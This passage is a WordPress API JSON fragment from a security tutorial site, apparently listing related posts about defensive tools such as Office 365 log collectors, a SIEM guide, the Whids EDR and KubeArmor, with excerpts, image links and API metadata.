2x"},"classes":[]},{"id":13128,"url":"https:\/\/kalilinuxtutorials.com\/dfir-o365rc-power\/","url_meta":{"origin":26391,"position":1},"title":"DFIR-O365RC : PowerShell Module For Office 365 And Azure AD Log Collection","author":"R K","date":"May 30, 2021","format":false,"excerpt":"The DFIR-O365RC PowerShell module is a set of functions that allow the DFIR analyst to collect logs relevant for Office 365 Business Email Compromise investigations. The logs are generated in JSON format and retrieved from two main data sources: Office 365\u00a0Unified Audit Logs.Azure AD\u00a0sign-ins logs\u00a0and\u00a0audit logs. The two data sources\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":810,"url":"https:\/\/kalilinuxtutorials.com\/a-beginners-guide-to-siem\/","url_meta":{"origin":26391,"position":2},"title":"What is SIEM? Complete Guide to Security Information and Event Management","author":"0xSnow","date":"September 10, 2025","format":false,"excerpt":"Introduction As cyber threats grow more sophisticated, organizations need more than just firewalls and antivirus tools. They require complete visibility into their IT environment, covering user activities, endpoint logs, application events, and network traffic. This is where SIEM (Security Information and Event Management) comes in. A SIEM solution collects, normalizes,\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"what is siem?","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":27567,"url":"https:\/\/kalilinuxtutorials.com\/whids\/","url_meta":{"origin":26391,"position":3},"title":"Whids : Open Source EDR For Windows","author":"R K","date":"November 8, 2022","format":false,"excerpt":"Whids is a Open Source EDR For Windows with artifact collection driven by detection. The detection engine is built on top of a previous project Gene specially designed to match Windows events against user defined rules. What do you mean by \"artifact collection driven by detection\" ? It means that\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":12902,"url":"https:\/\/kalilinuxtutorials.com\/kubearmor-container-aware-runtime-security-enforcement-system\/","url_meta":{"origin":26391,"position":4},"title":"KubeArmor : Container-aware Runtime Security Enforcement System","author":"R K","date":"May 17, 2021","format":false,"excerpt":"Introduction to KubeArmor KubeArmor is a container-aware runtime security enforcement system that restricts the behavior (such as process execution, file access, networking operation, and resource utilization) of containers at the system level. KubeArmor operates with\u00a0Linux security modules (LSMs), meaning that it can work on top of any Linux platforms (such\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":34488,"url":"https:\/\/kalilinuxtutorials.com\/office-365-extractor\/","url_meta":{"origin":26391,"position":5},"title":"Office 365 Extractor &#8211; A Complete Guide To Extracting Audit Logs And Enhancing Forensic Investigations","author":"Varshini","date":"August 19, 2024","format":false,"excerpt":"This script makes it possible to extract log data out of an Office365 environment. The script created by us consist out of four main options, which enable the investigator to easily extract logging out of an Office365 environment. Show available log sources and amount of logging Extract all audit logging\u2026","rel":"","context":"In &quot;Forensics&quot;","block_context":{"text":"Forensics","link":"https:\/\/kalilinuxtutorials.com\/category\/f\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=26391"}],"version-history":[{"count":8,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26391\/revisions"}],"predecessor-version":[{"id":26559,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26391\/revisions\/26559"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/26400"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=26391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=26391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=26391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}